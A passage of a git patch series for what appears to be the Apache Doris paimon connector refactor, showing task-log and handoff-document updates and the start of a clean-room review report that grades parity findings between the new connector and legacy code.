`3c1e118dcfa`)**:直接读真实代码全路 + 对抗 recon `wf_9437dd4e-06d`(6 reader+synth+verify=SOUND/READY,逐键 parity 通过)→ 2 边界经 AskUserQuestion 定:**D-014**(采用 spi legacy-faithful validate——CREATE CATALOG 比当前 paimon 更严:HMS forbidIf(simple)/requireIf(kerberos)、REST case-sensitive `"dlf".equals`、DLF 在 CREATE 要求 OSS;故意向 legacy 收敛)、**D-015**(JDBC 注册副作用留连接器,仅纯 `resolveDriverUrl` 共享,Rule 2 不投机)。**改 5 main+2 test+pom**(白名单内,净 +318/−847):`validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`;`createCatalog` HMS/DLF→`bind`+新薄 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS seed `loadHiveConfResources` base 再叠 `toHiveConfOverrides`,DLF `assembleHiveConf(null,toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;两处 driver-url→`JdbcDriverSupport.resolveDriverUrl`;`PaimonCatalogFactory` 删 6 法+`KNOWN_FLAVORS`+加 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只**部分**删,`HMS_URI`/`REST_URI`/`JDBC_*` 仍被 `buildCatalogOptions` 用故保留;`bind` 取代设计早期 `*MetastoreBackend.parse`;`assembleHiveConf` 为离线测 F2 而抽)。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证)+ 删 28 旧 builder/validate 测(content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 2 `assembleHiveConf` 测。**验证 paimon 全模块 278/0/1skip**、checkstyle 0、import-gate exit 0、白名单干净。**对抗 review `wf_dd78ec4b-da5`**(4 lens+verify=READY,0 真 finding;唯一 MAJOR「kerberos.principal alias 未测」证伪=该键走 verbatim passthrough→测它恒真 tautology 违 Rule 9,隔离 binding 的 `service.principal`→`kerberos.principal` 方向已被 spi line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + plugin-zip ServiceLoader 发现 5 provider 在子优先 loader=P2-T04/T05 真闸)。**下一步 P2-T04**。 - 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit `7ea63528bc4`)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 8ebf1f8442fd42..53868c8c00f6c0 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -126,6 +126,14 @@ --- +## RV — 全连接器 clean-room 对抗 review(已提升到主线) + +### RV-T01 ➡️ paimon connector 全功能路径 clean-room 对抗 review — **已移到主线** +- 用户 2026-06-18 澄清:本目录(`metastore-storage-refactor/`)是 **metastore-refactor 专属子线**;paimon connector 全功能路径 review(6 维度:读取/写入/DDL/元数据回放/元数据 cache/残留旧逻辑·fallback + **不注入开发历史先验**)审的是**整条 connector = catalog-spi 主线**范围,spec 归主线 [`../HANDOFF.md`](../HANDOFF.md)「下一个 session 的任务」,**本目录不复述**(避免在 metastore 子目录里放全连接器 review 的 scope 错配)。 +- 与本子线关系:该 review **先于 B8 legacy 删除**(legacy = 对照基线);**本子线自身剩余 = P2-T04 → P2-T05**,排在主线 review 之后。 + +--- + ## P3 — Kerberos 收口到 fe-kerberos 叶子模块(D-007;⚠️ 范围张力,见下) > **范围说明(用户 2026-06-17 确认)**:拆为 **P3a(paimon-local,✅ 纳入本次)** 与 **P3b(全量去重,follow-up,范围外)**。P3a 纯新增 + 只让 paimon 走新模块,不碰 fe-common/fe-filesystem-hdfs 既有路径 → 符合 D-005;P3b 会改 fe-common + fe-filesystem-hdfs,超出 D-005,与 hive/iceberg 迁移同批,本清单仅占位。 @@ -172,4 +180,5 @@ - 2026-06-17:创建任务清单(P0×2 / P1×6 / P2×5),状态全 ⬜,待用户批准后开始 P1。 - 2026-06-17:3 设计点定稿(D-006 provider 取代 MetaStoreType 枚举 / D-007 fe-kerberos 叶子 / D-008 vended 边界);P2-T01/T02 改写(去枚举、加 MetaStoreProvider);新增 P3a/P3b(Kerberos)。 - 2026-06-17:用户确认 **P3a 纳入本次** + 模块名 **`fe-kerberos`**。核心任务计数 13 → **14**(+P3a-T01);P3b 仍 follow-up(范围外占位)。 -- 2026-06-18:**P1-T07 ✅**(彻底删除 fe-property 孤儿模块,D-016):删目录(27 文件)+ fe/pom.xml 两声明 + 清 5 处 stale 注释(一并清理,用户选);全 FE reactor test-compile BUILD SUCCESS(fe-core 实编译,0 ERROR)+ paimon 278/0/1skip + hdfs 78/0/0 + grep fe-property 归零。任务计数 11→**12/15**。下一步 P2-T04(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg)。 +- 2026-06-18:**P1-T07 ✅**(彻底删除 fe-property 孤儿模块,D-016):删目录(27 文件)+ fe/pom.xml 两声明 + 清 5 处 stale 注释(一并清理,用户选);全 FE reactor test-compile BUILD SUCCESS(fe-core 实编译,0 ERROR)+ paimon 278/0/1skip + hdfs 78/0/0 + grep fe-property 归零。任务计数 11→**12/15**。commit `13d3876d25d`,已 push `catalog-spi-07-paimon`+`master-catalog-spi-07-paimon`,PR #64445 评论 `run buildall`。 +- 2026-06-18:**RV-T01(全连接器 clean-room review)提升到主线**:初排为本子线下一步,后经用户澄清(`metastore-storage-refactor/` 是 metastore-refactor 专属子线,全连接器 review 属 catalog-spi 主线)→ spec 移到主线 `../HANDOFF.md`(6 维度 + 不注入开发历史先验),先于 B8 legacy 删除(legacy=对照基线)。本目录仅留指针;本子线自身剩余 = P2-T04/T05(主线 review 后)。 From 5740d27bdc2d4caaefef21be19809b34e97fa633 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 23:23:59 +0800 Subject: [PATCH 099/128] docs(catalog-spi): P6 paimon full-path clean-room review report + HANDOFF Add the P6 full-path clean-room adversarial review of the paimon connector (review-only; no code changed). Two clean-room workflow waves with zero historical priors: wave 1 = 9 finder lines over the 6 user dimensions (read/write/DDL+config/replay/cache/residual), wave 2 = 7 coverage-gap lines (show-partitions, partitions-TVF, statistics/ANALYZE, @branch, MTMV, auth/UGI, config->BE). Each finding adversarially verified. Result: 2 BLOCKER, 2 MAJOR, 16 MINOR, 10 NIT (27 confirmed / 3 partial / 3 refuted). - The 2 BLOCKERs are B8-deletion guards, not runtime bugs: legacy property/metastore/Paimon* + PaimonExternalCatalog constants are still live (cutover Kerberos wiring), and property/storage/* is shared cross-connector infra -> B8 must be phased, not a blanket delete. - The 2 MAJORs are live read-path regressions (fix with cutover): C1 minio.* catalogs unbindable (FE+BE), C2 HDFS hadoop.config.resources XML not loaded into FE catalog-create config. Wave 2 narrowed C2 (kerberos-by-alias sub-claim refuted) and independently re-derived C1. - Everything else verified at parity (replay/GSON, scan->BE contract, write rejection, cache, SHOW PARTITIONS, partitions-TVF, stats/ANALYZE, @branch, MTMV, auth/UGI). HANDOFF updated to review-complete state with the phased-B8 backlog and prioritized fix-task list. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 83 +-- ...P6-paimon-fullpath-cleanroom-2026-06-18.md | 502 ++++++++++++++++++ 2 files changed, 553 insertions(+), 32 deletions(-) create mode 100644 plan-doc/reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 4b8e6378783da7..6f6fbb3877fcad 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,40 +6,58 @@ --- -# 🎯 下一个 session 的任务 — **paimon connector 全功能路径 clean-room 对抗 review**(先于 B8 legacy 删除) - -整个 paimon connector cutover(P0–P5 + round-3 fixes + 元存储子线)已落地。**删除任何 legacy 之前**,先对**整条连接器**做一次完整的、不带历史先验的回归式复审:从**设计**与**实现交付**两层判断对错,并**逐一对照 legacy 找差异**(区分有意偏离 vs 漏移植/回归)。这是整体复审,不是某个增量 task 的局部 review。 - -**6 个 review 维度**(用户指定;每维度独立成一条对抗 review 线): -1. **读取**(scan / split planning → BE 下发的整条读路) -2. **写入**(INSERT / sink,若存在则审,无则明确记录"无写路径") -3. **DDL**(CREATE/DROP CATALOG·DB·TABLE、CTAS、属性校验) -4. **元数据回放(metadata replay)**(catalog/db/table 持久化 + FE 重启 / edit-log replay 重建 + GSON 序列化/反序列化注册) -5. **元数据 cache**(schema / partition / sys-table / MVCC snapshot 等的填充·命中·失效·刷新) -6. **残留旧逻辑 / fallback**:还有哪些路径**仍走旧逻辑**或在某条件下 **fallback 回旧逻辑**(仍引用 fe-core legacy 类 / legacy/compat/instanceof/兜底分支) - -**方法**:clean-room 多 agent 对抗 review(参 memory `clean-room-adversarial-review-pref`)。每维度:finder(独立读**当前** paimon 实现 + **legacy 参照**实现,自行下判断)→ adversarial verifier(逐条试图**证伪**)→ synth。建议 workflow 编排(find→verify pipeline,每维度一条线)。 - -**⚠️⚠️ 关键约束(用户 2026-06-18 明确,最高优先级):本轮不得注入开发过程已有的先验知识。** -不把 `decisions-log` / `deviations-log` / `risks` / 既往 review 报告(含 `reviews/P5-*`)/ 过往 CI-RCA / `~/.claude/.../memory/*`(`catalog-spi-*`)/ tasks-doc rationale 当作 review 的前提或预设答案喂给 review agents——这些会用「早已查过 / 已判定 OK / 已知非 bug」制造盲区、限制 review 的公正性与开放性。review agents 的输入**只有代码**(当前 paimon connector 实现 + legacy 参照实现 + 6 维度问题)。clean-room 靠 **fresh subagent + 编排者精选 prompt** 实现(reviewer 不继承主 session 上下文;尤其要挡住主 session **自动注入**的 `catalog-spi-*` auto-memory 正文——对 clean-room 也是「待验证历史声明」非事实)。orchestrator 读本 HANDOFF **仅为流程定向**,不把任何历史结论作为 review 输入。**当作第一次看这套代码,从零独立判断对错与 parity。与既往「Phase C 交叉核对历史结论」相反,本轮刻意不做。** - -**对照基线(legacy / 原先逻辑)= 同时也是 B8 的删除目标**:fe-core `.../datasource/paimon/*` + -`.../datasource/property/storage/{OSS,COS,OBS,S3,Minio}Properties` + `.../property/metastore/HMSBaseProperties` 等 -(+ 必要时 git 历史里 paimon 迁移前实现)。**故 review 必须先于 B8**(删了就没了对照基线)。仅读其**代码**、不读其历史结论 / commit message 里的判断。 - -**产物**:review 报告落 `plan-doc/reviews/`(每维度 finding 分级 BLOCKER/MAJOR/MINOR/NIT + 与 legacy 差异清单[有意偏离 vs 回归] + 处置建议)。**先 review、不改代码**;发现的修复各自另起 task(AGENT-PLAYBOOK 单任务循环)。 +# 🎯 下一个 session 的任务 — **P6 review 已完成 → 进入「修复发现项」+「分阶段 B8 删除」** + +paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 +报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 +统计:**2 BLOCKER · 2 MAJOR · 16 MINOR · 10 NIT**(27 confirmed / 3 partial / 3 refuted)。方法:wave1 = 9 finder 线归 6 维度 +(read×2/write/ddl×2+config/replay/cache/residual),wave2 = 补 7 缺口线(show-partitions / partitions-TVF / 统计-ANALYZE / +@branch / MTMV / auth-UGI / config→BE),每线 finder→对抗 verifier;fresh subagent 仅喂代码+维度问题(成功挡住历史先验)。 + +**核心结论(详见报告)**: +- **2 BLOCKER 都是 B8 删除护栏、非运行时 bug**:R1 = legacy `property/metastore/Paimon*MetaStoreProperties` + `PaimonExternalCatalog` + **常量**仍 LIVE(cutover 的 `initPreExecutionAuthenticator`→Kerberos 装配经它);R2 = `property/storage/{S3,OSS,COS,OBS,Minio}Properties` + 是**跨连接器共享**(~26 消费者 iceberg/hive/glue/dlf/storage-vault/load/cloud/policy)。→ **B8 不能整包删,必须分阶段**。 +- **2 MAJOR 是真活读路回归**(不挡 B8,应随 cutover 修):**C1** = `minio.*`-keyed catalog 整条不可用(FE 建表 + BE 读,两波独立证实; + fe-filesystem 无 MinIO provider,S3 provider 不认 `minio.*`;2026-06-14 的 applyCanonicalMinioConfig 未进本分支);**C2** = HDFS + `hadoop.config.resources` XML 未注入 FE 建表 Configuration(filesystem/jdbc flavor)→ XML-only HA 拓扑解析不到 nameservice。 + **C2 的 kerberos-by-alias 子项被 wave2 证伪**(per-FS Configuration 的 auth marker 非负载性:JVM-global `UGI.setConfiguration` 主导 SASL)→ 只修 XML。 +- **其余全 parity**:replay/GSON 干净(0 缺陷)、scan→BE 契约(历史 double-fill / `file_format=jni` / schema-evo `-1` bug 均已修)、 + write(无写路、两侧都 loud-reject)、cache pin 模型、SHOW PARTITIONS(critic 的 `VARCHAR(60→300)` 担忧被证伪:master 早已 300)、 + partitions-TVF、统计/ANALYZE(row-count 一致、column-stat 两侧空、ANALYZE 走 generic)、@branch、MTMV 新鲜度、auth/UGI(split-plan + 等不裹 `executeAuthenticated` 与 legacy 完全一致 → 非回归,了结 HANDOFF 旧 open item)。MINOR/NIT 多为 EXPLAIN/profile/错误码 + parity 或刻意更安全的偏离。 + +**下一步**:本轮是 review、**未改任何代码**(除报告本身 + 我修正了 writer 的计数)。发现项各自另起 fix task(见下方 backlog 0 + 报告 +§Coverage gaps & follow-ups 的 prioritized fix-task list)。**AGENT-PLAYBOOK 单任务循环:先 review 方案后实现**。 --- -# 🔭 review 之后的主线 backlog(review 出报告后再排) - -1. **B8 legacy 删除**([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md) Follow-ups + 第三轮报告 R-1…R-8):删 fe-core - `datasource/paimon/*` + legacy `{OSS,COS,OBS,S3,Minio}Properties` / `HMSBaseProperties` 等 dead residue。 - **删除前提**:①上面的 review 完成(对照基线用完)②FIX-4 已 commit(literal 复刻对照完成)。**须保 load-bearing - dispatch ordering**(`ShowPartitionsCommand:478-480`,R-4)。逐子树删 + 每批跑 fe-core 编译 + 连接器测 + regression-gated。 - **⚠️ 跨线 tension**:元存储子线 D-016 记「fe-core `datasource.property.{storage,metastore}` 两包仍服务 - hive/hudi/iceberg、不碰」;B8 想删其中 paimon-only 部分——**B8 scope 须先经 review dim-6(残留旧逻辑/fallback)确认 - 哪些真 dead、哪些仍被 hive/hudi/iceberg 消费**,别误删在用类。 +# 🔭 主线 backlog(P6 review 已出报告,按此排) + +0. **修复 P6 发现项**(报告 §Coverage gaps & follow-ups → prioritized fix-task list;每个独立 fix task): + - **C1 MinIO**(MAJOR / 若部署用 `minio.*` 键则 BLOCKER):`S3FileSystemProvider.supports()` + `S3FileSystemProperties` + @ConnectorProperty 加 `minio.*` 别名(endpoint/access_key/secret_key/session_token/region/use_path_style/connection.*), + 保 MinIO 默认(region `us-east-1`、tuning 100/10000/10000);UT 钉 FE `fs.s3.impl`/`fs.s3a.*` + BE `location.AWS_*`。 + - **C2 HDFS XML**(MAJOR):filesystem/jdbc flavor 把 `hadoop.config.resources` XML 载入 FE 建表 Configuration(推荐让 + `HdfsFileSystemProperties` 实现 `HadoopStorageProperties` 暴露已载入的 backend map,复用 BE 路那张图)。**仅 XML 子项** + (kerberos-alias 已证非负载性)。 + - **R3 residual**(MINOR):去 `PluginDrivenScanNode` 的 `"paimon".equals(catalog.getType())` gate,VERBOSE 下无条件 + emit `appendBackendScanRangeDetail()`(同时修 MaxCompute VERBOSE 回归 + 违反「generic node 不按 source name 分支」规则 + 假注释)。 + - **R1 table**(MINOR):bridge `createTable` 补 `remoteExists && !ifNotExists` 臂报 `ERR_TABLE_EXISTS_ERROR`(1050)。 + - **C4 / R2-catalog / R3-catalog**(MINOR,可合一):HMS socket timeout 透传 `hive_metastore_client_timeout_second` / + `meta.cache.paimon.table.*` warn-and-strip(键已 dead)/ `listDatabaseNames` `LOG.warn` 带 catalog 名(择一)。 + - 其余 MINOR/NIT + wave2 新增(全 intentional-deviation):报告已标「文档化为接受偏离」,逐条 accept-as-deviation(含用户签字)。 +1. **B8 legacy 删除(review 已解锁;须分阶段,按报告 §B8 deletion readiness 的 DEAD vs STILL-CONSUMED ledger)**: + - **可删(DEAD,成单元同删)**:`datasource/paimon/*`(PaimonExternalCatalog/Factory、ExternalDatabase/Table、HMS/DLF/File/Rest 子类、 + SysExternalTable、MetaCache 等)、`systable/PaimonSysTable`、`metacache/paimon/*` + `ExternalMetaCacheMgr.paimon()/ENGINE_PAIMON`、 + `ShowPartitionsCommand`/`Env`/`ExternalCatalog.buildDbForInit`/`UserAuthentication`/`ExternalMetaCacheRouteResolver` 的死 legacy 分支+import。 + - **删除前置(硬)**:① 先把 `PaimonExternalCatalog` 的常量(`PAIMON_FILESYSTEM`/`PAIMON_HMS`)迁出到 metastore-props 模块(5 个 live 类 import 它); + ② scrub 悬空 javadoc `{@link PaimonSysTable}`(`PluginDrivenSysTable:27`、`NativeSysTable:36`)否则 strict checkstyle/javadoc 挂; + ③ 保 load-bearing dispatch ordering(`ShowPartitionsCommand` PluginDriven 分支先于 legacy)。 + - **不可删(STILL-CONSUMED)**:`property/metastore/Paimon*MetaStoreProperties`+`PaimonPropertiesFactory`+`AbstractPaimonProperties`(cutover + Kerberos 装配 LIVE,R1)、`property/storage/{S3,OSS,COS,OBS,Minio}Properties`(跨连接器共享,R2)。**B8 scope 不含这两树。** + - 逐子树删 + 每批跑 fe-core 编译 + 连接器测 + regression-gated。与元存储子线 D-016 一致(那两包不碰)。 2. **元存储子线收尾**([`metastore-storage-refactor/`](./metastore-storage-refactor/)):P2-T04(paimon pom + gate, ⚠️ `MetaStoreProviders` ServiceLoader 改 2-arg 显式 loader 防子优先 loader 下发现不到 provider)→ P2-T05(docker 5-flavor 真闸 + vended(REST/DLF) + Kerberos HMS + storage 等价,合并原 P1-T06;`enablePaimonTest=true`)。 @@ -65,7 +83,8 @@ - ⚠️ `regression-test/conf/regression-conf.groovy` 仍 modified 未 commit 且含**明文 Aliyun key** → commit 前继续 path-whitelist,**严禁 `git add -A`**;`regression-conf.groovy.bak` 同理排除。 - 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`);`reviews/P5-paimon-rereview3-2026-06-12.md` - (第三轮 review 报告,未跟踪——大文件,下次方便时 vet+commit 或保留本地)。 + (第三轮 review 报告);**`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`(本轮全路径 clean-room review 报告,502 行,本 session 产物)**。 + HANDOFF.md 本身已更新(review 完成态)。三者未跟踪——下次方便时 vet + path-whitelist commit 或保留本地。 ## 🗺️ 代码脚手架 - **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/` diff --git a/plan-doc/reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md b/plan-doc/reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md new file mode 100644 index 00000000000000..0b5952e68c3c38 --- /dev/null +++ b/plan-doc/reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md @@ -0,0 +1,502 @@ +# P6 — Paimon Connector Full-Path Clean-Room Review (2026-06-18) + +**Scope.** Parity review of the *current* Paimon catalog connector (`fe/fe-connector/fe-connector-paimon`, forbidden from importing fe-core) **plus the generic engine bridge** (`org.apache.doris.datasource.PluginDriven*`, `org.apache.doris.connector.*`) against the **legacy fe-core baseline** (`org.apache.doris.datasource.paimon`, `org.apache.doris.datasource.property.{storage,metastore}`) **and the BE C++ consumers** (`be/src/format/table/paimon_*.{cpp,h}`, `partition_column_filler.h`). "Parity" = connector + generic bridge **together** reproduce the legacy fe-core paimon behavior; a difference is a regression only if the net end-to-end behavior changed. + +**Method.** Clean-room multi-agent review with **zero historical priors**: 9 finder lines (grouped into 6 dimensions) traced the code independently → each finding passed through an **adversarial verifier** (verdict: confirmed / partial / refuted, with corrected severity/classification) → a **completeness critic** swept for uncovered surfaces. Findings graded BLOCKER / MAJOR / MINOR / NIT. + +**Caveats.** +- The BE C++ side was reviewed **by reading only** (field-presence / wiring verification); no per-backend native read was exercised. +- **No live / docker e2e** was run; `enablePaimonTest=true` suites were not executed. +- All verdicts are **code-reasoning**, not runtime observation. +- `refuted` findings are excluded from headline counts and the main body; they appear in the appendix. + +--- + +## Executive summary + +### Counts by severity (confirmed + partial; wave 1 + wave 2 consolidated) + +| Severity | Count | +|----------|-------| +| BLOCKER | 2 | +| MAJOR | 2 | +| MINOR | 16 | +| NIT | 10 | +| **Total** | **30** | + +(The wave-1 dimension sections below carry 23 findings; wave 2 — the coverage-gap closure pass, see §Wave 2 — added 7 more. **No new BLOCKER/MAJOR** beyond wave 2's independent re-derivation of C1/C2.) + +### Counts by verdict + +| Verdict | Count | +|---------|-------| +| confirmed | 27 | +| partial | 3 | +| refuted | 3 | +| **Total reviewed** | **33** | + +(Partial findings are kept in the body using the verifier's corrected severity/classification. The two BLOCKERs and the two MAJORs below are all confirmed/partial.) + +### Every BLOCKER and MAJOR + +- **[R1 / residual] BLOCKER** — LIVE cut-over path still depends on legacy `property/metastore/Paimon*MetaStoreProperties` + `PaimonExternalCatalog` constants → NOT deletable in B8. +- **[R2 / residual] BLOCKER** — `property/storage/{S3,OSS,COS,OBS,Minio}Properties` are shared cross-connector infra (≈26 named consumers) → NOT deletable in B8. +- **[C1 / config] MAJOR** (downgraded from BLOCKER by verifier) — MinIO storage backend is unbindable for pure `minio.*`-keyed catalogs → empty storage config → "no file io for scheme s3"; the default/tested `s3.*`-keyed MinIO path is unaffected. +- **[C2 / config] MAJOR** — HDFS-backed paimon catalog drops legacy-derived config keys (`hadoop.config.resources` XML, ipc fallback default, `hdfs.security.authentication`, `hdfs.authentication.*` kerberos aliases, `juicefs.*`) on the catalog-create Configuration path. + +### Go / No-Go for B8 legacy deletion + +**NO-GO as a blanket deletion.** Two BLOCKERs (R1, R2) identify legacy trees that are **still live or shared**: the `property/metastore/Paimon*` classes wire Kerberos auth for cut-over paimon at runtime, and `property/storage/*` is shared by ~26 cross-connector consumers (iceberg/hive/glue/dlf/storage-vault/load/cloud/policy). B8 may proceed **only for the proven-dead trees** (see §B8 deletion readiness) and **only after** severing the 5 metastore-props imports of `PaimonExternalCatalog` constants and scrubbing dangling javadoc `{@link PaimonSysTable}` references. The two config MAJORs (C1 MinIO, C2 HDFS) do not block B8 deletion mechanically but are open correctness regressions on live read paths that should be fixed before/with the cutover ships. **Wave 2 (coverage-gap closure) independently re-derived C1 and C2** — corroborating both; its skeptic rated MinIO a BLOCKER (severity reconciliation in §Wave 2) — and **narrowed C2**: the `hadoop.config.resources` XML-resource gap is a real MAJOR, but the kerberos-by-alias sub-claim was **refuted** (the per-FS Configuration auth marker is not load-bearing). The other closed surfaces (SHOW PARTITIONS, partitions-TVF, statistics/ANALYZE, `@branch`, MTMV, auth/UGI) are at parity. **The full-path review is now complete.** + +--- + +## Read (scan / split planning → BE) + +This dimension was covered by two finder lines: **read-scan** (FE scan/split planning) and **read-be** (FE→BE contract & native/JNI downflow). + +### What was reviewed / verified-OK + +The full Paimon scan/split path was traced clean-room: connector `PaimonScanPlanProvider` / `PaimonScanRange` / `PaimonIncrementalScanParams` / `PaimonPredicateConverter` / `PaimonTableHandle` / `PaimonTableResolver` plus the generic bridges `PluginDrivenScanNode` / `PluginDrivenSplit`, against legacy `PaimonScanNode` / `PaimonSplit` / `PaimonPredicateConverter` / `PaimonValueConverter` / `PaimonUtil` / `PaimonExternalTable`. Verified at parity (no row/route impact): split enumeration (`ReadBuilder.withFilter+withProjection`), JNI-vs-native routing (3-bool gate), COUNT(*) pushdown (first-arm, single representative range, `-1` DV sentinel), native sub-splitting (`computeFileSplitOffsets` byte-faithful incl. 1.1× tail guard, DV on every sub-range), deletion vectors, predicate pushdown (empty list always emitted to avoid BE NPE, AND-flatten / OR all-or-nothing / IN / IS NULL / LIKE-prefix, UTC TIMESTAMP literal, LTZ/FLOAT/CHAR not pushed), partition-value serialization (byte-faithful, `isNull` from Java-null only), `path_partition_keys` emission (prevents native double-fill DCHECK, CI-968880), incremental `@incr` validation + `FIX-INCR-SCAN-RESET`, time-travel via `Table.copy`, schema-evolution `-1` dict keyed off **requested** columns (CI-969249 invariant), LIMIT not consumed, cpp-reader serialization gated on `instanceof DataSplit`. + +On the FE→BE contract: every emitted field (`file_format_type=jni`, `table_format_type=paimon`, `path_partition_keys`, `paimon.serialized_table`, `paimon.predicate` always-incl-empty, `paimon.options_json`, `location.*`, `paimon.schema_evolution`, per-split `paimon.split`/`schema_id`/real `file_format`/`deletion_file`/`row_count`/`columns_from_path*`) was verified consumed by the matching BE reader (`paimon_reader.cpp` / `paimon_cpp_reader.cpp` / `paimon_jni_reader.cpp` / `partition_column_filler.h` / `table_schema_change_helper.h`) against the thrift contract. The `file_format="jni"` legacy bug is fixed; the schema-evolution `-1` invariant and `$ro` schema-dict unwrap are present. **No BLOCKER/MAJOR** — all findings are EXPLAIN-output / split-weight / profile-counter parity deviations that do not change rows returned or scanner routing. + +### Findings + +| id | title | severity | legacy-class | verdict | +|----|-------|----------|--------------|---------| +| R1 (scan) | Plugin splits get uniform split weight; legacy computed proportional weight | MINOR | regression | confirmed | +| R2 (scan) | EXPLAIN drops legacy `predicatesFromPaimon:` line | MINOR | missing-port | confirmed | +| R3 (scan) | CAST-wrapped predicates not pushed to Paimon (legacy unwrapped CAST) | MINOR | intentional-deviation | confirmed | +| R1 (be) | JNI split `self_split_weight` omitted when weight is 0 | NIT | regression | confirmed | +| R2 (be) | `history_schema_info` emitted as scan-level dict, not per-split-accumulated | NIT | intentional-deviation | confirmed | + +#### R1 (scan) — Plugin splits get uniform split weight + +- **Severity:** MINOR · **Classification:** regression · **Verdict:** confirmed +- **Location:** `PluginDrivenSplit.java:39-48`; `PaimonScanRange.java:92-94,194-197` (real evidence is here, not the cited `buildNativeRange`); `FileSplit.java:104-117`. +- **Description:** Legacy `PaimonSplit` sets `selfSplitWeight` in both ctors (fileSize-sum for DataSplit/JNI, length for native sub-split, `+deletionFile.length()`) and `PaimonScanNode.getSplits:499` sets `targetSplitSize` on **all** splits, so `FederationBackendPolicy` distributes splits by proportional weight. On the SPI path `PluginDrivenSplit` forwards start/length/fileSize but never sets `selfSplitWeight`/`targetSplitSize`, so every plugin split hits the null branch → `SplitWeight.standard()` (uniform). FE-side load-balancing deviation only; same rows read. +- **Evidence:** `FileSplit.getSplitWeight()`: `if (selfSplitWeight != null && targetSplitSize != null) {...} else { return SplitWeight.standard(); }`. Legacy `PaimonSplit:60` `this.selfSplitWeight = dataFileMetas.stream().mapToLong(DataFileMeta::fileSize).sum();`. +- **Verifier:** Confirmed. BE-side thrift `self_split_weight` is only a profile-condition counter (`jni_reader.h:67`), NOT the scheduling input; both legacy and SPI set it identically only in the JNI branch → exact BE parity. The only delta is FE-side proportional-vs-uniform weighting via `FederationBackendPolicy.getSplitWeight()`. The connector already computes `selfSplitWeight` (`PaimonScanRange.getSelfSplitWeight:169`) but it never reaches `FileSplit`. +- **Remediation:** If parity matters for large-table scheduling, add `getSelfSplitWeight()`/`getTargetSplitSize()` to the SPI `ConnectorScanRange` and populate `FileSplit` fields in the `PluginDrivenSplit` ctor; otherwise document uniform-weight as accepted. + +#### R2 (scan) — EXPLAIN drops legacy `predicatesFromPaimon:` line + +- **Severity:** MINOR · **Classification:** missing-port · **Verdict:** confirmed +- **Location:** `PluginDrivenScanNode.java:270-275,315-324`; `PaimonScanPlanProvider.java:1116-1129` (appendExplainInfo). Legacy `PaimonScanNode.java:660-668`. +- **Description:** Legacy emitted a `predicatesFromPaimon:` block listing the converted Paimon `Predicate` objects actually pushed to the SDK (or ` NONE`). The SPI path emits a generic `PREDICATES: ` line (raw Doris conjuncts) + `paimonNativeReadSplits=` + VERBOSE `PaimonSplitStats`, but no `predicatesFromPaimon:`. Diagnostically a silently-dropped LTZ/FLOAT/CAST conjunct is no longer observable. No correctness impact; `grep predicatesFromPaimon regression-test` = 0. +- **Evidence:** Legacy `sb.append(prefix).append("predicatesFromPaimon:"); ... for (Predicate predicate : predicates) {...}`. Connector `appendExplainInfo` emits no predicate listing. +- **Verifier:** Confirmed. The generic node retains only counts, not the converted `Predicate` objects, so it cannot trivially 